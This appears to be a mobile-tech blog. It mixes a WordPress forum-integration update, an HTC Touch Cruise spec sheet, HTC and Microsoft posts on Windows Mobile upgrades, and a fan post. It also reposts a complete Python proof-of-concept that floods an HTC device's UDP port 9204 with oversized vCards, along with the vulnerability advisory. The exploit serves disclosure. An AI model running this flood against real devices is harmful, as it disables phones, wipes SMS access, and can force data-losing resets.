Buzzdev.org

Yeah! I’ve just successfully finished Main site and forum integration.

That is, cookies and database are now integrated. :) So once you are logged in at main page, you are also logged in in forums. That’s really great :) Sorry, i can’t help myself, but i am happy, that it is really working :)

Please test it at: http://buzzdev.org/forums/

Now i have to complete the “deep integration”, which is to embedd forum into the main site and make it look acceptable. The default bb-press theme is horrible…

One day i also have to post, how the cookie and database integration is done, in case, that someone else would like to integrate WPMU with bb-press.

Below is the source code for HTC Touch vCard DoS exploit

#! /usr/bin/env python
#
# Copyright (c) 2009 Mobile Security Lab www.mseclab.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#

from socket import *
from sys import exit,argv
from time import *
import random
from optparse import OptionParser

# Global Variables
PORT = 9204
DEF_NUM_PACKETS = 10
DEF_VCARD_LEN = 1410
DEF_DELAY = 0.7
VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:"
VCARD_TRAILER = "\r\nEND:VCARD\r\n"

def main():
    # Local variables
    num_packets = DEF_NUM_PACKETS
    delay = DEF_DELAY

    print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n"
    # Parsing options
    parser = OptionParser("usage: %prog [options] target_IP")
    parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)")
    parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count")
    parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay")
    parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len")
    parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text")

    # Parse input
    (options, args) = parser.parse_args()
    if len(args) != 1:
        parser.print_help()
        print ""
        exit(1)

    if options.count:
        num_packets = options.count

    if options.delay:
        delay = options.delay

    if options.silence:
        vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER
    elif options.len:
        vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER
    elif options.text:
        vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER
    else:
        vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER

    # Socket creation
    udp_sock = socket(AF_INET, SOCK_DGRAM)
    ADDR = (args[0],PORT)

    # Start sending packet
    counter = 1
    c_lap = 0
    total_data = 0
    print "Sending %d packets... to %s" % (num_packets,ADDR)
    start_time = time()
    start_lap = time()

    # Start sending packet
    while counter < = num_packets:
        len_sent = udp_sock.sendto(vcard_body,ADDR)
        if len_sent != len(vcard_body):
            print "Error sending packet n.%d" %counter
            break

        # Update Counter
        counter += 1
        c_lap += 1
        total_data += len_sent

        # Sleep for letting the device parse vcards
        sleep(delay)

        # Check number of packets in a second
        local_lap = time()
        if local_lap - start_lap >= 1:
            print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap))
            start_lap = local_lap
            c_lap = 0

    stop_time = time()
    stop_sec = stop_time - start_time

    # Display info
    print "Sent %d packets in %f seconds" % (num_packets, stop_sec)
    print "Start time: %s" %ctime(start_time)
    print "Stop time: %s" %ctime(stop_time)
    print "Payload Len = %d bytes" % len(vcard_body)
    print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024)))

#Global start
if __name__ == "__main__":
    main()

# milw0rm.com 2009-03-02

“You are browsing with your shiny smartphone while being connected to a wireless LAN.
Suddenly you receive a single SMS carrying a new contact information.
You don’t even have the time to check it, that your SMS inbox starts filling with unwanted messages and you don’t seem to be able to stop it…”

This is a possible scenario that may happen if you are victim of a vCard Denial of Service.

If you are curious, how that really works, try it out yourself on your own device.
Open the URL below in your HTC Touch and press a button.

Exploit test: http://poc.mseclab.com/MSL-2008-002_Test.html

Vulnerability Details

Vendor: HTC

Platforms: Touch Pro, Touch Cruise

Class: Denial of Service

Remote: Yes

Local: No

Public References: Not Assigned

Affected: HTC Touch Pro, HTC Touch Cruise

Not Affected: Currently Unknown

Description

UDP/9204 port is open and reachable both via WiFi and GPRS/UMTS connection when the device is capable of sending and receiving SMS.
Port is always open on the Touch Pro, while on Touch Cruise the port is open when the SMS application is running.

UDP/9204 is associated with the service WAP-vCard and is used for sending vCard files to the device, that are displayed as normal SMS to users.
By flooding the device with multiple vCards it is possible to perform a Denial of Service attack that affects usability, SMS handling and connectivity.
By sending large number of vCards an attacker can achieve significant device slowdown, making the UI sluggish and hard to use.
In some cases WiFi connections may be dropped (when vCards are sent via WiFi), effectively disconnecting the device from the network.

On Touch Cruise devices, SMS inbox can be completely filled by sending more then 450 large vCards (size 32K).
The device will not be able to receive SMS anymore or to access the message stored inside the device until SMS deletion occurs.
Additionally, when large vCards are sent, no acoustic notification (ring tones) will be played upon incoming messages, making the attack more silent and less noticeable by an user.

Battery removal may be needed, in some cases, for restoring normal functionalities.
Manual deletion of all received SMS requires a very long time, making the deletion of all the SMS the most viable option, but leading to loss of all received SMS and requiring in any case a large amount of time (even hours).
The faster option for restoring the device is performing a hard reset of the device, leading to the loss of all the content saved on the handset.

The attack can be easily carried in all the scenarios where the device IP stack is accessible to an attacker, such as Wireless LANs and Mobile Networks assigning public IP addresses without any firewall protection.

Solutions and Workaround

A personal firewall solution can be used for denying unwanted access to the port, effectively avoiding possible attacks.

Additional Info

Timeline:
2008-12-03: Issue discovery
2008-12-05: Initial Vendor Notification: Point of Contact requested via contact form on website (No suitable e-mail available)
2008-12-14: Vendor Response: Customer support answered without providing any suitable contact for vulnerability communication
2008-12-19: Public Disclosure

Vendor Statement: None

Exploit example: Source code by mseclab

Published by Mobile Security Lab on 2008-12-19.

Overview

The All new HTC Touch Cruise™ is intelligent enough to help you navigate from point A to point B, but that is just the beginning. With the introduction of HTC Footprints™, you have a mobile phone that lets you grasp all the precious details of the instances that make up your life.

Your Life Chronicles

We all strive to capture and hang on to the moments that touch our life. The HTC Touch Cruise™ does just that. Take a picture and the HTC Footprints™ automatically saves your location. Embellish your instance further by adding the thoughts that surrounded that special moment. You can even grab the sound of your friend’s laughter to go along with your memory.

The best part about HTC Footprints™ is that you can use them to find your way back to the hidden little café you visited last year, or the elm tree under which your loved one popped the big question. And if you want, you can simply flip through your collection and laugh about the times that helped create who you are today. HTC Footprints™ is like a journal of your life’s highlights, making them always within your reach.

Highlights

• HTC Footprints™HTC Footprints™ lets you create a vivid collection of your life’s chronicles.
• Navipanel ModeNavipanel mode transforms your smartphone into a simple to use turn-by-turn navigator.
• 3.2 Megapixel Camera3.2 megapixel camera with geotagging so you can always return to your favorite spots.
• Internet ConnectivityInternet connectivity reaching broadband speeds.

Specification

Processor

• Qualcomm® MSM7225™, 528 MHz

Operating System

• Windows Mobile® 6.1 Professional

Memory ROM

• 512 MB

RAM

• 256 MB

Dimensions

• 102mm (L) x 53.5mm (W) x 14.5mm (T)

Weight

• 103g (with battery)

Display

• 2.8” TFT-LCD touch-sensitive screen with QVGA resolution

Network

• HSDPA/WCDMA
  Europe/Asia: 900/2100 MHz
  Up to 384kbps up-link and up to 7.2Mbps down-link speeds

• Quad-band GSM/GPRS/EDGE:
  850/900/1800/1900MHz
  (Band frequency and data speed are operator dependent)

Device Control

• HTC TouchFLO™
• 4-Way Navigation Wheel with Enter button
• HTC Footprint™ button

GPS

• Internal GPS antenna
• A-GPS capable (service provided by Google)

Connectivity

• Bluetooth® 2.0 with EDR and A2DP for stereo wireless headsets
• Wi-Fi®: IEEE 802.11 b/g
• HTC ExtUSBTM (11-pin mini-USB 2.0 and audio jack in one), full-speed USB 2.0

Camera

• 3.2 mega-pixel colour camera

Audio Supported Format

• AAC, AAC+, eAAC+, AMR, AWB, QCP, MP3, WMA, WAV and MIDI

Video Supported Format

• WMV, ASF, MP4, 3GP, 3G2, M4V and AVI

Battery

• 1100mAh rechargeable Lithium-ion battery

Talk time

• Up to 375 minutes for WCDMA
• Up to 400 minutes for GSM

Standby time

• Up to 400 hours for WCDMA
• Up to 330 hours for GSM

(The above are subject to network and phone usage)

Expansion Slot

• microSD™ memory card (SD 2.0 compatible)

AC Adaptor

• Voltage range/frequency: 100-240V AC, 50/60Hz, DC output: 5V and 1A

Special Features

• Includes proprietary in-car holder, photo geotagging

Source: HTC News

Microsoft recently unveiled Windows Mobile® 6, which offers improved usability and more PC-like functionality than previously available.
Enhancements include the ability to view emails in rich HTML format, and to manage emails quickly and easily through new shortcuts and new calendar views.
The HTC S710 is one of the first Windows Mobile® 6 devices to ship, and will be followed by a range of products based on the new operating system in the coming months.
HTC is also offering WM6 upgrades for the most popular devices in its current range. This includes recently launched “messaging” products, which will enjoy the greatest benefits of Windows Mobile 6, such as the HTC Advantage, the HTC TyTN, the HTC S620, and the HTC P4350. The upgrade will also be available for the award-winning HTC P3300, plus some of our operator-branded devices.
The upgrades will be rolled out from June, in line with our operator partners’ strategies.
You’ll be able to find the latest releases as they’re made available at: http://downloads.europe.htc.com

Additional Qs for reactive use only:

Why have these devices been chosen?

We have chosen devices with a particular focus on “messaging”, where users will enjoy the greatest benefits of Windows Mobile 6 (the HTC Advantage, the HTC TyTN, the HTC S620, and the HTC P4350). The upgrade will also be available for the award-winning HTC P3300.

Will other devices be added?

Potentially. We’re in constant discussions with our operator partners, and if they’re seeing significant demand from their customers for a specific
device then we will always consider it.

When will the upgrade be available?

The upgrades will be rolled out from April.

I’ve heard that [operator] is not offering the upgrade. Why is that? Can their customers get the upgrade from HTC direct?

It’s really up to the operators to decide how, or indeed whether, to offer the upgrade, so you’d need to speak to them. HTC is only directly offering upgrades for its own brand devices.

Will consumers have to pay upgrade license fees?

No, the usual licence upgrade fees are being waived.

How much of a difference will users notice with the new operating system?

Windows Mobile 6 delivers the ability to view e-mails in their original rich HTML format with live links to Web and SharePoint ® sites, which means text and images are displayed as they would be on a PC, and are available from a corporate e-mail server such as Exchange Server 2007, from Web-based accounts such as Windows Live™ Hotmail or from a myriad of other popular service providers. Windows Mobile 6 also includes Windows Live for Windows Mobile, which provides customers with a rich set of Windows Live services. For example, now through Windows Live Messenger, people can chat with more than one person at one time, express themselves through animated figures, quickly send a file or image, or record and send voice notes.
The newest version of the platform offers the most genuine Microsoft Office system experience in the mobile versions of Office Outlook ®, Office Word, Office Excel® and Office PowerPoint® by bringing capabilities once available only on the PC versions of these products to the small screen. This allows users to neatly view, navigate and edit Word documents and Excel spreadsheets in their original formatting, without affecting tables, images or text, and to view PowerPoint presentations on their device.
All Windows Mobile 6 powered devices include Direct Push Technology for up-to-date e-mail delivery and automatic synchronization of Outlook calendars, tasks and contacts through Microsoft Exchange Server.
Windows Mobile 6 also offers a set of important device security and management features that include the capability to remotely wipe all data from a device should it be lost or stolen, helping ensure that confidential information remains that way.

About HTC

Founded in 1997, High Tech Computer Corp. (HTC) designs, manufactures and markets innovative, feature rich smartphone and PDA phone devices.
Since its establishment, HTC has developed strong R&D capabilities, pioneered many new designs and product innovations, and launched state-of-the-art PDA Phones and Smartphones for mobile operators and distributors in Europe, the US, and Asia. These machines are available as HTC devices and as products individually customized for operator and device partners.
HTC is one of the fastest growing companies in the mobile device market. The company is listed on the Taiwan Stock Exchange under ticker 2498. For more information about HTC, please visit http://www.htc.com

Guys, you cannot miss this one.

When i saw it, i knew, that we can throw our today’s PDA “top technology” phones out of the window…
Here comes the greatest Sumsing Turbo 3000Xi Multitask mobile phone:

Sumsing Turbo 3000

Finally, the word from Microsoft is out.
Again, it was Mike Calligaro, who wrote this cool article, why there is no WM5 upgrade for this or that device.
I suggest you to read that one.

From msdn blogs:

Why Can’t I Upgrade?

We released Windows Mobile 5 a few months ago and devices are starting to hit the market now.  A question I’ve seen asked in a number of places is, “Why can’t I upgrade my existing WM 2003 SE devices to WM5?”

The answer is sure to get me a bunch of angry comments from people who abbreviate our name “M$.”  You can choose to see this as spin from a greedy marketing wonk, or you can see it for what it is–an honest attempt from a developer to explain how this stuff works.

Possible vs. Practical
Since 2002, we’ve set our hardware requirements and designed our software to make it possible to upgrade any PocketPC or Smartphone at least once.  And there have been a number of devices that have upgraded from one version to the next.  Also, some of our partners have announced that some of their WM 2003 SE devices will be upgraded to WM5.  But, by and large, the number of devices that will upgrade is pretty small.

The trouble is, while it’s possible to upgrade devices, it’s often not practical to do so.  The reason it’s not practical boils down this:
1) It costs a lot of money to upgrade a device
2) So few people upgrade that it’s hard to amortize this cost

Second things First
I know that it’s frustrating to want to upgrade and hear me say, “But no one upgrades.”  Obviously you want to upgrade.  You wouldn’t be reading this if you didn’t.  And, I’ll bet you know a bunch of people who want to upgrade as well.  Please understand, the companies involved do not say, “Hey, let’s not bother to upgrade the device.  We won’t piss off too many people.”  Everyone wants to upgrade your devices.  There are a number of reasons for this, not the least of which is that we know that providing upgrades makes customers happy.  And, yes, we all like happy customers.

It’s not about figuring out how many people we can get away with annoying.  Upgrades don’t happen due to a much simpler calculation.

(Total cost of doing the upgrade) / (number of people who will use it) = (unreasonable price)

The value of “unreasonable price” varies from situation to situation.  But there have been times where it was higher than the price of a new phone.  Because there have been upgrades in the past, we know how many people do them.  And, even though you know a bunch of people who want to upgrade, it’s still a tiny percentage of the owners of that device.

Show me the Money
So what are all these costs?  The first is the cost of developing and testing all the drivers for a new version of the OS.  While Microsoft writes the bulk of the software on a WM device, a significant amount of it is written by the OEM or ODM who created the hardware.  And the part they do is the most complicated part of the device: the drivers, parts of the kernel, and the radio stack.  On major OS revisions, many of these parts need to be changed, sometimes dramatically.  And, any time they need to be changed, extensive testing needs to be done.

Another cost is associated with phone devices sold through Mobile Operators.  MOs rightfully want to be sure that any device on their network doesn’t interfere with other devices on their network.  To do this, they put every device they plan to sell through a battery of tests that last weeks.  If a significant amount of code on the device changes, it needs to be retested.  And that takes away testing time from another device.  The Mobile Operator needs to make a conscious decision to test an upgrade that few people will use instead of testing a sexy new phone that potentially many more will buy.

Another cost comes from how difficult it is to upgrade these devices.  The steps are complicated, there are changes that users don’t expect, and sometimes it doesn’t work.  All of those situations result in calls to product support, which are really expensive.  Yes, you’re capable of pulling off the upgrade.  But you’re techy enough to be reading an MSDN site.  How do you think your grandmother would fare?

Well, what are you doing about it?
In WM5 we spent a lot of time building an infrastructure for enabling updates that anyone can do.  We’re heading toward a Windows Update sort of experience, where you’re using your phone and it suddenly pops up a box that says something like, “An update is available, would you like to have it installed?”  Then you just need to select “Yes” and it’ll happen for you.  How much OEMs and Mobile Operators make use of this infrastructure is up to them, but it’s there now.  This should solve the “could your grandmother do it?” problem, especially for smaller updates like security fixes.

Of course, to do this, we had to change a ton of stuff, which makes the first two problems even bigger for this release.  No pain, no gain.

We’re doing a few things to make future updates easier for OEMs and Mobile Operators.  First, we’re going to try to do some smaller releases that don’t require changes in OEM code.  If the drivers don’t need to change, then it’s much easier for the OEM to take an update from us and make it work.  The Mobile Operators will still want to test the device, but, hopefully, if the drivers didn’t change, they can have some assurance that the things they worry most about didn’t change either.  That should make their testing easier.

Longer term, we’re looking at ways to design our OS so that even major revisions don’t require significant driver changes.  We don’t know for sure that we’ll be able to pull that off, but it’s a goal we’re striving toward.

No it’s not just “greed”
I’ve seen people complain that upgrades don’t happen because the parties involved are just greedy.  I guess there’s a fine line between “economics” and “greed” but that line does exist.  The economics of the situation are that it often just doesn’t make sense to provide an upgrade.  We’re working on both parts of that equation.  We’re trying to reduce the total upgrade cost, and make upgrading easy enough that more people will make use of it.  Whether this work will result in more upgrades being provided in the future remains to be seen.  But we hope so.

Mike Calligaro
MS Windows Mobile Team

I guess all Himalaya users out there will agree that owning this piece of device was one of the smartest investments ever for an enthusiast. According to Albert Einstein in his theory of relativity, time can be relative depending on where you are. A simple example is riding a train for a minute or watching for a minute as the train passes you by at a blazing speed. If there’s such thing as time travel – a Himalaya user has already experienced it. I’ve been a Himalaya user for four months and this device has been leapfrogging me through time. It all started with my simple quest of having a landscape view on my excel application. From the out of the box with a 1.66 WWE mobile OS, it has evolved into one of the most successful hardware with myriad of upgrades and software available. Of course, this has been made possible by the triumvirate whom I called xtb. Their tremendous creativity and patience in software development has given me the channel to engage in time travel with my Himalaya. Now running under Magneto, it has transformed my device into a behemoth in the world of pocket pc tossing me through time at blinding speed.

Quoting one of my brother and guru he said: “running the Magneto into my Himalaya is like putting windows xp into your pocket pc”. Indeed it is!

But equally important is the working relationship of the triumvirate I called xtb. Their sheer determination and passion with Himalaya has been colossal. I just hope that they continue their working relationship of course, with the support of the brotherhood in the Himalaya World. More power to the triumvirate!